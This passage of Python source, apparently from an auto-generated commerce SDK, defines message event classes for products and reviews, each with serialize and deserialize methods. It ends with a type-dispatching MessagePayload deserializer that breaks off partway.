resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductAddedToCategory",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductAddedToCategoryMessage":
from ._schemas.message import ProductAddedToCategoryMessageSchema
return ProductAddedToCategoryMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductAddedToCategoryMessageSchema
return ProductAddedToCategoryMessageSchema().dump(self)
class ProductCreatedMessage(Message):
product_projection: "ProductProjection"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
product_projection: "ProductProjection"
):
self.product_projection = product_projection
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductCreated",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "ProductCreatedMessage":
from ._schemas.message import ProductCreatedMessageSchema
return ProductCreatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductCreatedMessageSchema
return ProductCreatedMessageSchema().dump(self)
class ProductDeletedMessage(Message):
removed_image_urls: typing.List["str"]
current_projection: "ProductProjection"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
removed_image_urls: typing.List["str"],
current_projection: "ProductProjection"
):
self.removed_image_urls = removed_image_urls
self.current_projection = current_projection
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductDeleted",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "ProductDeletedMessage":
from ._schemas.message import ProductDeletedMessageSchema
return ProductDeletedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductDeletedMessageSchema
return ProductDeletedMessageSchema().dump(self)
class ProductImageAddedMessage(Message):
variant_id: int
image: "Image"
staged: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
variant_id: int,
image: "Image",
staged: bool
):
self.variant_id = variant_id
self.image = image
self.staged = staged
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductImageAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductImageAddedMessage":
from ._schemas.message import ProductImageAddedMessageSchema
return ProductImageAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductImageAddedMessageSchema
return ProductImageAddedMessageSchema().dump(self)
class ProductPriceDiscountsSetMessage(Message):
updated_prices: typing.List["ProductPriceDiscountsSetUpdatedPrice"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
updated_prices: typing.List["ProductPriceDiscountsSetUpdatedPrice"]
):
self.updated_prices = updated_prices
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductPriceDiscountsSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductPriceDiscountsSetMessage":
from ._schemas.message import ProductPriceDiscountsSetMessageSchema
return ProductPriceDiscountsSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductPriceDiscountsSetMessageSchema
return ProductPriceDiscountsSetMessageSchema().dump(self)
class ProductPriceDiscountsSetUpdatedPrice(_BaseType):
variant_id: int
variant_key: typing.Optional[str]
sku: typing.Optional[str]
price_id: str
discounted: typing.Optional["DiscountedPrice"]
staged: bool
def __init__(
self,
*,
variant_id: int,
variant_key: typing.Optional[str] = None,
sku: typing.Optional[str] = None,
price_id: str,
discounted: typing.Optional["DiscountedPrice"] = None,
staged: bool
):
self.variant_id = variant_id
self.variant_key = variant_key
self.sku = sku
self.price_id = price_id
self.discounted = discounted
self.staged = staged
super().__init__()
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductPriceDiscountsSetUpdatedPrice":
from ._schemas.message import ProductPriceDiscountsSetUpdatedPriceSchema
return ProductPriceDiscountsSetUpdatedPriceSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductPriceDiscountsSetUpdatedPriceSchema
return ProductPriceDiscountsSetUpdatedPriceSchema().dump(self)
class ProductPriceExternalDiscountSetMessage(Message):
variant_id: int
variant_key: typing.Optional[str]
sku: typing.Optional[str]
price_id: str
discounted: typing.Optional["DiscountedPrice"]
staged: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
variant_id: int,
variant_key: typing.Optional[str] = None,
sku: typing.Optional[str] = None,
price_id: str,
discounted: typing.Optional["DiscountedPrice"] = None,
staged: bool
):
self.variant_id = variant_id
self.variant_key = variant_key
self.sku = sku
self.price_id = price_id
self.discounted = discounted
self.staged = staged
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductPriceExternalDiscountSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductPriceExternalDiscountSetMessage":
from ._schemas.message import ProductPriceExternalDiscountSetMessageSchema
return ProductPriceExternalDiscountSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductPriceExternalDiscountSetMessageSchema
return ProductPriceExternalDiscountSetMessageSchema().dump(self)
class ProductPublishedMessage(Message):
removed_image_urls: typing.List["str"]
product_projection: "ProductProjection"
scope: "ProductPublishScope"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
removed_image_urls: typing.List["str"],
product_projection: "ProductProjection",
scope: "ProductPublishScope"
):
self.removed_image_urls = removed_image_urls
self.product_projection = product_projection
self.scope = scope
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductPublished",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductPublishedMessage":
from ._schemas.message import ProductPublishedMessageSchema
return ProductPublishedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductPublishedMessageSchema
return ProductPublishedMessageSchema().dump(self)
class ProductRemovedFromCategoryMessage(Message):
category: "CategoryReference"
staged: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
category: "CategoryReference",
staged: bool
):
self.category = category
self.staged = staged
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductRemovedFromCategory",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductRemovedFromCategoryMessage":
from ._schemas.message import ProductRemovedFromCategoryMessageSchema
return ProductRemovedFromCategoryMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductRemovedFromCategoryMessageSchema
return ProductRemovedFromCategoryMessageSchema().dump(self)
class ProductRevertedStagedChangesMessage(Message):
removed_image_urls: typing.List["str"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
removed_image_urls: typing.List["str"]
):
self.removed_image_urls = removed_image_urls
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductRevertedStagedChanges",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductRevertedStagedChangesMessage":
from ._schemas.message import ProductRevertedStagedChangesMessageSchema
return ProductRevertedStagedChangesMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductRevertedStagedChangesMessageSchema
return ProductRevertedStagedChangesMessageSchema().dump(self)
class ProductSlugChangedMessage(Message):
slug: "LocalizedString"
old_slug: typing.Optional["LocalizedString"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
slug: "LocalizedString",
old_slug: typing.Optional["LocalizedString"] = None
):
self.slug = slug
self.old_slug = old_slug
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductSlugChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductSlugChangedMessage":
from ._schemas.message import ProductSlugChangedMessageSchema
return ProductSlugChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductSlugChangedMessageSchema
return ProductSlugChangedMessageSchema().dump(self)
class ProductStateTransitionMessage(Message):
state: "StateReference"
force: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
state: "StateReference",
force: bool
):
self.state = state
self.force = force
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductStateTransition",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductStateTransitionMessage":
from ._schemas.message import ProductStateTransitionMessageSchema
return ProductStateTransitionMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductStateTransitionMessageSchema
return ProductStateTransitionMessageSchema().dump(self)
class ProductUnpublishedMessage(Message):
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None
):
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductUnpublished",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductUnpublishedMessage":
from ._schemas.message import ProductUnpublishedMessageSchema
return ProductUnpublishedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductUnpublishedMessageSchema
return ProductUnpublishedMessageSchema().dump(self)
class ProductVariantAddedMessage(Message):
variant: "ProductVariant"
staged: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
variant: "ProductVariant",
staged: bool
):
self.variant = variant
self.staged = staged
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductVariantAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductVariantAddedMessage":
from ._schemas.message import ProductVariantAddedMessageSchema
return ProductVariantAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductVariantAddedMessageSchema
return ProductVariantAddedMessageSchema().dump(self)
class ProductVariantDeletedMessage(Message):
variant: "ProductVariant"
removed_image_urls: typing.List["str"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
variant: "ProductVariant",
removed_image_urls: typing.List["str"]
):
self.variant = variant
self.removed_image_urls = removed_image_urls
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ProductVariantDeleted",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ProductVariantDeletedMessage":
from ._schemas.message import ProductVariantDeletedMessageSchema
return ProductVariantDeletedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ProductVariantDeletedMessageSchema
return ProductVariantDeletedMessageSchema().dump(self)
class ReviewCreatedMessage(Message):
review: "Review"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
review: "Review"
):
self.review = review
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ReviewCreated",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "ReviewCreatedMessage":
from ._schemas.message import ReviewCreatedMessageSchema
return ReviewCreatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ReviewCreatedMessageSchema
return ReviewCreatedMessageSchema().dump(self)
class ReviewRatingSetMessage(Message):
old_rating: typing.Optional[float]
new_rating: typing.Optional[float]
included_in_statistics: bool
target: typing.Optional["Reference"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
old_rating: typing.Optional[float] = None,
new_rating: typing.Optional[float] = None,
included_in_statistics: bool,
target: typing.Optional["Reference"] = None
):
self.old_rating = old_rating
self.new_rating = new_rating
self.included_in_statistics = included_in_statistics
self.target = target
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ReviewRatingSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ReviewRatingSetMessage":
from ._schemas.message import ReviewRatingSetMessageSchema
return ReviewRatingSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ReviewRatingSetMessageSchema
return ReviewRatingSetMessageSchema().dump(self)
class ReviewStateTransitionMessage(Message):
old_state: "StateReference"
new_state: "StateReference"
old_included_in_statistics: bool
new_included_in_statistics: bool
target: "Reference"
force: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
old_state: "StateReference",
new_state: "StateReference",
old_included_in_statistics: bool,
new_included_in_statistics: bool,
target: "Reference",
force: bool
):
self.old_state = old_state
self.new_state = new_state
self.old_included_in_statistics = old_included_in_statistics
self.new_included_in_statistics = new_included_in_statistics
self.target = target
self.force = force
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ReviewStateTransition",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ReviewStateTransitionMessage":
from ._schemas.message import ReviewStateTransitionMessageSchema
return ReviewStateTransitionMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ReviewStateTransitionMessageSchema
return ReviewStateTransitionMessageSchema().dump(self)
class UserProvidedIdentifiers(_BaseType):
key: typing.Optional[str]
external_id: typing.Optional[str]
order_number: typing.Optional[str]
customer_number: typing.Optional[str]
sku: typing.Optional[str]
slug: typing.Optional["LocalizedString"]
def __init__(
self,
*,
key: typing.Optional[str] = None,
external_id: typing.Optional[str] = None,
order_number: typing.Optional[str] = None,
customer_number: typing.Optional[str] = None,
sku: typing.Optional[str] = None,
slug: typing.Optional["LocalizedString"] = None
):
self.key = key
self.external_id = external_id
self.order_number = order_number
self.customer_number = customer_number
self.sku = sku
self.slug = slug
super().__init__()
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "UserProvidedIdentifiers":
from ._schemas.message import UserProvidedIdentifiersSchema
return UserProvidedIdentifiersSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import UserProvidedIdentifiersSchema
return UserProvidedIdentifiersSchema().dump(self)
class MessagePayload(_BaseType):
type: str
def __init__(self, *, type: str):
self.type = type
super().__init__()
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "MessagePayload":
if data["type"] == "CategoryCreated":
from ._schemas.message import CategoryCreatedMessagePayloadSchema
return CategoryCreatedMessagePayloadSchema().load(data)
if data["type"] == "CategorySlugChanged":
from ._schemas.message import CategorySlugChangedMessagePayloadSchema
return CategorySlugChangedMessagePayloadSchema().load(data)
if data["type"] == "CustomLineItemStateTransition":
from ._schemas.message import (
CustomLineItemStateTransitionMessagePayloadSchema,
)
return CustomLineItemStateTransitionMessagePayloadSchema().load(data)
if data["type"] == "CustomerAddressAdded":
from ._schemas.message import CustomerAddressAddedMessagePayloadSchema
return CustomerAddressAddedMessagePayloadSchema().load(data)
if data["type"] == "CustomerAddressChanged":
from ._schemas.message import CustomerAddressChangedMessagePayloadSchema
return CustomerAddressChangedMessagePayloadSchema().load(data)
if data["type"] == "CustomerAddressRemoved":
from ._schemas.message import CustomerAddressRemovedMessagePayloadSchema
return CustomerAddressRemovedMessagePayloadSchema().load(data)
if data["type"] == "CustomerCompanyNameSet":
from ._schemas.message import CustomerCompanyNameSetMessagePayloadSchema
return CustomerCompanyNameSetMessagePayloadSchema().load(data)
if data["type"] == "CustomerCreated":
from ._schemas.message import CustomerCreatedMessagePayloadSchema
return CustomerCreatedMessagePayloadSchema().load(data)
if data["type"] == "CustomerDateOfBirthSet":
from ._schemas.message import CustomerDateOfBirthSetMessagePayloadSchema
return CustomerDateOfBirthSetMessagePayloadSchema().load(data)
if data["type"] == "CustomerEmailChanged":
from ._schemas.message import CustomerEmailChangedMessagePayloadSchema
return CustomerEmailChangedMessagePayloadSchema().load(data)
if data["type"] == "CustomerEmailVerified":
from ._schemas.message import CustomerEmailVerifiedMessagePayloadSchema
return CustomerEmailVerifiedMessagePayloadSchema().load(data)
if data["type"] == "CustomerGroupSet":
from ._schemas.message import CustomerGroupSetMessagePayloadSchema
return CustomerGroupSetMessagePayloadSchema().load(data)
if data["type"] == "CustomerPasswordUpdated":
from ._schemas.message import CustomerPasswordUpdatedMessagePayloadSchema
return CustomerPasswordUpdatedMessagePayloadSchema().load(data)
if data["type"] == "DeliveryAdded":
from ._schemas.message import DeliveryAddedMessagePayloadSchema
return DeliveryAddedMessagePayloadSchema().load(data)
if data["type"] == "DeliveryAddressSet":
from ._schemas.message import DeliveryAddressSetMessagePayloadSchema
return DeliveryAddressSetMessagePayloadSchema().load(data)
if data["type"] == "DeliveryItemsUpdated":
from ._schemas.message import DeliveryItemsUpdatedMessagePayloadSchema
return DeliveryItemsUpdatedMessagePayloadSchema().load(data)
if data["type"] == "DeliveryRemoved":
from ._schemas.message import DeliveryRemovedMessagePayloadSchema
return DeliveryRemovedMessagePayloadSchema().load(data)
if data["type"] == "InventoryEntryCreated":
from ._schemas.message import InventoryEntryCreatedMessagePayloadSchema
return InventoryEntryCreatedMessagePayloadSchema().load(data)
if data["type"] == "InventoryEntryDeleted":
from ._schemas.message import InventoryEntryDeletedMessagePayloadSchema
return InventoryEntryDeletedMessagePayloadSchema().load(data)
if data["type"] == "InventoryEntryQuantitySet":
from ._schemas.message import InventoryEntryQuantitySetMessagePayloadSchema
return InventoryEntryQuantitySetMessagePayloadSchema().load(data)
if data["type"] == "LineItemStateTransition":
from ._schemas.message import LineItemStateTransitionMessagePayloadSchema
return LineItemStateTransitionMessagePayloadSchema().load(data)
if data["type"] == "OrderBillingAddressSet":
from ._schemas.message import OrderBillingAddressSetMessagePayloadSchema
return OrderBillingAddressSetMessagePayloadSchema().load(data)
if data["type"] == "OrderCreated":
from ._schemas.message import OrderCreatedMessagePayloadSchema
return OrderCreatedMessagePayloadSchema().load(data)
if data["type"] == "OrderCustomLineItemDiscountSet":
from ._schemas.message import (
OrderCustomLineItemDiscountSetMessagePayloadSchema,
)
return OrderCustomLineItemDiscountSetMessagePayloadSchema().load(data)
if data["type"] == "OrderCustomerEmailSet":
from ._schemas.message import OrderCustomerEmailSetMessagePayloadSchema
return OrderCustomerEmailSetMessagePayloadSchema().load(data)
if data["type"] == "OrderCustomerGroupSet":
from ._schemas.message import OrderCustomerGroupSetMessagePayloadSchema
return OrderCustomerGroupSetMessagePayloadSchema().load(data)
if data["type"] == "OrderCustomerSet":
from ._schemas.message import OrderCustomerSetMessagePayloadSchema
return OrderCustomerSetMessagePayloadSchema().load(data)
if data["type"] == "OrderDeleted":
from ._schemas.message import OrderDeletedMessagePayloadSchema
return OrderDeletedMessagePayloadSchema().load(data)
if data["type"] == "OrderDiscountCodeAdded":
from ._schemas.message import OrderDiscountCodeAddedMessagePayloadSchema
return OrderDiscountCodeAddedMessagePayloadSchema().load(data)
if data["type"] == "OrderDiscountCodeRemoved":
from ._schemas.message import OrderDiscountCodeRemovedMessagePayloadSchema
return OrderDiscountCodeRemovedMessagePayloadSchema().load(data)
if data["type"] == "OrderDiscountCodeStateSet":
from ._schemas.message import OrderDiscountCodeStateSetMessagePayloadSchema
return OrderDiscountCodeStateSetMessagePayloadSchema().load(data)
if data["type"] == "OrderEditApplied":
from ._schemas.message import OrderEditAppliedMessagePayloadSchema
return OrderEditAppliedMessagePayloadSchema().load(data)
if data["type"] == "OrderImported":
from ._schemas.message import OrderImportedMessagePayloadSchema
return OrderImportedMessagePayloadSchema().load(data)
if data["type"] == "OrderLineItemAdded":
from ._schemas.message import OrderLineItemAddedMessagePayloadSchema
return OrderLineItemAddedMessagePayloadSchema().load(data)
if data["type"] == "OrderLineItemDiscountSet":
from ._schemas.message import OrderLineItemDiscountSetMessagePayloadSchema
return OrderLineItemDiscountSetMessagePayloadSchema().load(data)
if data["type"] == "OrderPaymentStateChanged":
from ._schemas.message import OrderPaymentStateChangedMessagePayloadSchema
return OrderPaymentStateChangedMessagePayloadSchema().load(data)
if data["type"] == "ReturnInfoAdded":
from ._schemas.message import OrderReturnInfoAddedMessagePayloadSchema
return OrderReturnInfoAddedMessagePayloadSchema().load(data)
if data["type"] == "OrderReturnShipmentStateChanged":
from ._schemas.message import (
OrderReturnShipmentStateChangedMessagePayloadSchema,
)
return OrderReturnShipmentStateChangedMessagePayloadSchema().load(data)
if data["type"] == "OrderShipmentStateChanged":
from ._schemas.message import OrderShipmentStateChangedMessagePayloadSchema
return OrderShipmentStateChangedMessagePayloadSchema().load(data)
if data["type"] == "OrderShippingAddressSet":
from ._schemas.message import OrderShippingAddressSetMessagePayloadSchema
return OrderShippingAddressSetMessagePayloadSchema().load(data)
if data["type"] == "OrderShippingInfoSet":
from ._schemas.message import OrderShippingInfoSetMessagePayloadSchema
return OrderShippingInfoSetMessagePayloadSchema().load(data)
if data["type"] == "OrderShippingRateInputSet":
from ._schemas.message import OrderShippingRateInputSetMessagePayloadSchema
return OrderShippingRateInputSetMessagePayloadSchema().load(data)
if data["type"] == "OrderStateChanged":
from ._schemas.message import OrderStateChangedMessagePayloadSchema
return OrderStateChangedMessagePayloadSchema().load(data)
if data["type"] == "OrderStateTransition":
from ._schemas.message import OrderStateTransitionMessagePayloadSchema
return OrderStateTransitionMessagePayloadSchema().load(data)
if data["type"] == "OrderStoreSet":
from ._schemas.message import OrderStoreSetMessagePayloadSchema
return OrderStoreSetMessagePayloadSchema().load(data)
if data["type"] == "ParcelAddedToDelivery":
from ._schemas.message import ParcelAddedToDeliveryMessagePayloadSchema
return ParcelAddedToDeliveryMessagePayloadSchema().load(data)
if data["type"] == "ParcelItemsUpdated":
from ._schemas.message import ParcelItemsUpdatedMessagePayloadSchema
return ParcelItemsUpdatedMessagePayloadSchema().load(data)
if data["type"] == "ParcelMeasurementsUpdated":
from ._schemas.message import ParcelMeasurementsUpdatedMessagePayloadSchema
return ParcelMeasurementsUpdatedMessagePayloadSchema().load(data)
if data["type"] == "ParcelRemovedFromDelivery":
from ._schemas.message import ParcelRemovedFromDeliveryMessagePayloadSchema
return ParcelRemovedFromDeliveryMessagePayloadSchema().load(data)
if data["type"] == "ParcelTrackingDataUpdated":
from ._schemas.message import ParcelTrackingDataUpdatedMessagePayloadSchema
return ParcelTrackingDataUpdatedMessagePayloadSchema().load(data)
if data["type"] == "PaymentCreated":
from ._schemas.message import PaymentCreatedMessagePayloadSchema
return PaymentCreatedMessagePayloadSchema().load(data)
if data["type"] == "PaymentInteractionAdded":
from ._schemas.message import PaymentInteractionAddedMessagePayloadSchema
return PaymentInteractionAddedMessagePayloadSchema().load(data)
if data["type"] == "PaymentStatusInterfaceCodeSet":
from ._schemas.message import (
PaymentStatusInterfaceCodeSetMessagePayloadSchema,
)
return PaymentStatusInterfaceCodeSetMessagePayloadSchema().load(data)
if data["type"] == "PaymentStatusStateTransition":
from ._schemas.message import (
